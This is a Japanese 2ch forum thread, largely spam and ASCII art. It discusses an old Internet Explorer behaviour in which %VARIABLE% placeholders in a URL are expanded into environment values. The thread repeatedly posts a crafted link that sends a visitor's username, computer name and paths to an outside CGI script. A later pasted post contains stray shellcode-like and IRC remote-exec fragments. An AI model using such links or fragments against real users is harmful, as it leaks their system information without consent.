IEの0dayアタック?
1 :名無しさん@お腹いっぱい。:
なんかあるブログを見てたらIEから情報が漏れるみたいなことが書いてあったんですが
これはどういう原理でもれてるんですか?誰か教えてください
ちなみにttp://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERD
OMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&
注意:実際にはURLバーに1行で入れます
にアクセスすると私の名前とかが出てくるんです…
これはどういう原理でもれてるんですか?誰か教えてください
ちなみにttp://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERD
OMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&
注意:実際にはURLバーに1行で入れます
にアクセスすると私の名前とかが出てくるんです…
|
|
|
2get!
3 :名無しさん@お腹いっぱい。:04/10/29 16:54:13
えぇー
4 :名無しさん@お腹いっぱい。:04/10/29 16:57:36
4げと
5 :名無しさん@お腹いっぱい。:04/10/29 17:01:43
マシンの情報を表示してるだけじゃねえか
くだらん
くだらん
環境変数だな
7 :名無しさん@お腹いっぱい。:04/10/29 17:06:25
マシンの情報を表示すんのがあなだってことじゃねーの?
穴じゃないだろう・・・これは
「仕様」の一言で片付けられるものだと思う
「仕様」の一言で片付けられるものだと思う
9 :名無しさん@お腹いっぱい。:04/10/29 17:23:53
リファラがあると表示されないみたいね
コピペで行くと表示される
コピペで行くと表示される
10 :名無しさん@お腹いっぱい。:04/10/29 17:25:47
MS社員ハケーン
11 :名無しさん@お腹いっぱい。:04/10/30 07:54:48
ん、環境変数を%で囲ってURLに入れたら
勝手にその値に置き換えて送信するのか
初めて知った
勝手にその値に置き換えて送信するのか
初めて知った
12 :名無しさん@お腹いっぱい。:04/10/30 12:11:59
こういうのを「仕様」とかっていうやつ
本当にいるんだねぇ
本当にいるんだねぇ
13 :名無しさん@お腹いっぱい。:04/10/30 16:56:14
IE(mshtml.dll)単体では展開しないけど、それをくるんでいるシェル部分が勝手に展開しちゃうみたいですね。
その証拠に、シェルを経由しないように、meta refreshを使って環境変数展開を入れたURLに飛んでも展開されてません。
だからIEレンダラを使うぷにる他は無害と見ていいでしょう。
なお、「ファイル名を指定して実行」で同URLを入れても展開されます。
この場合には、既定のブラウザに展開された状態で渡されてます。
(Mozilla等に渡された時点ですでに展開済み)
激しく既知だろうからsageとく。
その証拠に、シェルを経由しないように、meta refreshを使って環境変数展開を入れたURLに飛んでも展開されてません。
だからIEレンダラを使うぷにる他は無害と見ていいでしょう。
なお、「ファイル名を指定して実行」で同URLを入れても展開されます。
この場合には、既定のブラウザに展開された状態で渡されてます。
(Mozilla等に渡された時点ですでに展開済み)
激しく既知だろうからsageとく。
14 :名無しさん@お腹いっぱい。:04/11/02 11:59:15
仕様は仕様だと思うよ。すくなくとも bug じゃない印象。
ただし、「悪用される恐れのある仕様」のように思われるので、
MS には仕様変更をキボン
ただし、「悪用される恐れのある仕様」のように思われるので、
MS には仕様変更をキボン
15 :名無しさん@お腹いっぱい。:04/11/05 18:11:47
16 :名無しさん@お腹いっぱい。:04/11/14 01:43:06
うわーこれはおもしろいです。
なんか使えそうですね!
なんか使えそうですね!
17 :名無しさん@お腹いっぱい。:05/01/13 22:08:20
>>1
乙
乙
18 :名無しさん@お腹いっぱい。:05/01/15 19:02:10
∧_∧
( ・∀・) | | ガッ
と ) | |
Y /ノ 人
/ ) < >__Λ∩
_/し' //. V`Д´)/
(_フ彡
( ・∀・) | | ガッ
と ) | |
Y /ノ 人
/ ) < >__Λ∩
_/し' //. V`Д´)/
(_フ彡
19 :名無しさん@お腹いっぱい。:05/02/27 00:22:19
hoshu
b
b
20 :名無しさん@お腹いっぱい。:05/03/05 23:14:41
nurupo
21 :名無しさん@お腹いっぱい。:05/03/06 19:46:03
∧_∧
( ・∀・) | | ガッ
と ) | |
Y /ノ 人
/ ) < >__Λ∩
_/し' //. V`Д´)/
(_フ彡
( ・∀・) | | ガッ
と ) | |
Y /ノ 人
/ ) < >__Λ∩
_/し' //. V`Д´)/
(_フ彡
22 :名無しさん@お腹いっぱい。:05/03/06 22:15:29
http://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERDOMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&nullpo
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&nullpo
23 :名無しさん@お腹いっぱい。:05/03/07 10:38:47
( _,, -''" ', ____
ニ .( l ',____,、 .,.. 、. / \
ハ ( .', ト───‐' /r.、_,ヽ'テ`---. 、 l │
ハ ( .', |. ,. '" '", ‐゙" `'ー-.、 | ニ 仕 |
( /ィ h / .,. ヤ , , ヽ 、ヽ.ヽ | ハ 様 │
⌒⌒⌒ヽ(⌒ヽ/ ', l.l ゝ 〈 i. i. | i. l i. l',. ヽ ゙i. ヾヽ | ハ だ|
 ̄ ', fllJ / ゝ/l. | ,li'+ メ l | / ';ヾ', l、 l ' | ! │
ヾ ル'ノ |ll ./ / `カ"l | ´| レ' レ .l' .i | ',.| l |
〉vw'レハノ l.lll.. ../ i . 〃 ', ,| ,l / ヽ l.',.l リ . ヽ ____/
l_,,, =====、_ !'lll ./ i 〃 .`{| |'''' ヽ---/ ゙゙゙i ',-く. )ノ
_,,ノ※※※※※`ー,, / i /.!. | l | \/ ._, イ ',. ヾ
-‐'"´ ヽ※※※※※_,, -''"`''ー-、' .L_ | li iヾー---rヘi | ', l
 ̄ ̄ ̄ ̄ ̄ `''ー-、..,ハ|.i ', ミ.T'iノ .||. |. ', !
ニ .( l ',____,、 .,.. 、. / \
ハ ( .', ト───‐' /r.、_,ヽ'テ`---. 、 l │
ハ ( .', |. ,. '" '", ‐゙" `'ー-.、 | ニ 仕 |
( /ィ h / .,. ヤ , , ヽ 、ヽ.ヽ | ハ 様 │
⌒⌒⌒ヽ(⌒ヽ/ ', l.l ゝ 〈 i. i. | i. l i. l',. ヽ ゙i. ヾヽ | ハ だ|
 ̄ ', fllJ / ゝ/l. | ,li'+ メ l | / ';ヾ', l、 l ' | ! │
ヾ ル'ノ |ll ./ / `カ"l | ´| レ' レ .l' .i | ',.| l |
〉vw'レハノ l.lll.. ../ i . 〃 ', ,| ,l / ヽ l.',.l リ . ヽ ____/
l_,,, =====、_ !'lll ./ i 〃 .`{| |'''' ヽ---/ ゙゙゙i ',-く. )ノ
_,,ノ※※※※※`ー,, / i /.!. | l | \/ ._, イ ',. ヾ
-‐'"´ ヽ※※※※※_,, -''"`''ー-、' .L_ | li iヾー---rヘi | ', l
 ̄ ̄ ̄ ̄ ̄ `''ー-、..,ハ|.i ', ミ.T'iノ .||. |. ', !
24 :名無しさん@お腹いっぱい。:2005/03/23(水) 23:10:15
25 :名無しさん@お腹いっぱい。:2005/07/08(金) 13:25:32
パイズリ
26 :名無しさん@お腹いっぱい。:2006/06/03(土) 10:07:50
おめこ
27 :名無しさん@お腹いっぱい。:2006/08/18(金) 23:30:24
一太郎も0 dayアタック
NHKニュースでも話題に
狙いは日本政府の機密情報だとか(ホンマかいな)
一太郎2005/2006 セキュリティ更新モジュール
http://www3.justsystem.co.jp/download/ichitaro/up/win/060818.html
NHKニュースでも話題に
狙いは日本政府の機密情報だとか(ホンマかいな)
一太郎2005/2006 セキュリティ更新モジュール
http://www3.justsystem.co.jp/download/ichitaro/up/win/060818.html
MSN版IE7
http://promotion.msn.co.jp/ie7/
http://download.msn.co.jp/download.aspx/sid=I7bzPs2A/ie7setup.exe
Yahoo版IE7
http://recommend.yahoo.co.jp/ie7/campaign/index.html
http://recommend.yahoo.co.jp/ie7/index.html
http://a109.g.akamai.net/7/109/31749/000/downloads.yahoo.co.jp/browser/ie/7/IE7Setup.exe
Google版IE7
http://www.google.com/toolbar/ie7/intl/ja/
http://dl.google.com/toolbar/data/ie7/IE7Setup_G_JP.exe
29 :名無しさん@お腹いっぱい。:2007/04/10(火) 22:57:55
ゲラゲラ
30 :名無しさん@お腹いっぱい。:2007/09/16(日) 19:32:11
>10
>12
一人が叩くと雪崩を打つように「チキン野郎」が叩き始める良い例だなw
>12
一人が叩くと雪崩を打つように「チキン野郎」が叩き始める良い例だなw
31 :名無しさん@お腹いっぱい。:2009/10/11(日) 20:31:37
マシンの情報を表示してるだけだろう
心配することはないんではないか
心配することはないんではないか
32 :名無しさん@お腹いっぱい。:2010/11/08(月) 11:08:54
♥
33 :名無しさん@お腹いっぱい。:2011/01/06(木) 22:55:28
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/
漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/
漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
34 : 忍法帖【Lv=40,xxxPT】(7+0:8) 【43.5m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/06(日) 13:36:17.17 BE:243245838-PLT(12079)
9でもなる?
35 :名無しさん@お腹いっぱい。:2013/11/25(月) 21:46:42.67
正当防衛は通用するんかな?
36 :山崎 渉(^^):2014/03/27(木) 02:11:25.86
━―━―━―━―━―━―━―━―━[JR新山崎駅(^^)]━―━―━―━―━―━―━―━―━―
37 :名無しさん@お腹いっぱい。:2014/09/27(土) 20:15:10.32
7
38 :名無しさん@お腹いっぱい。:
8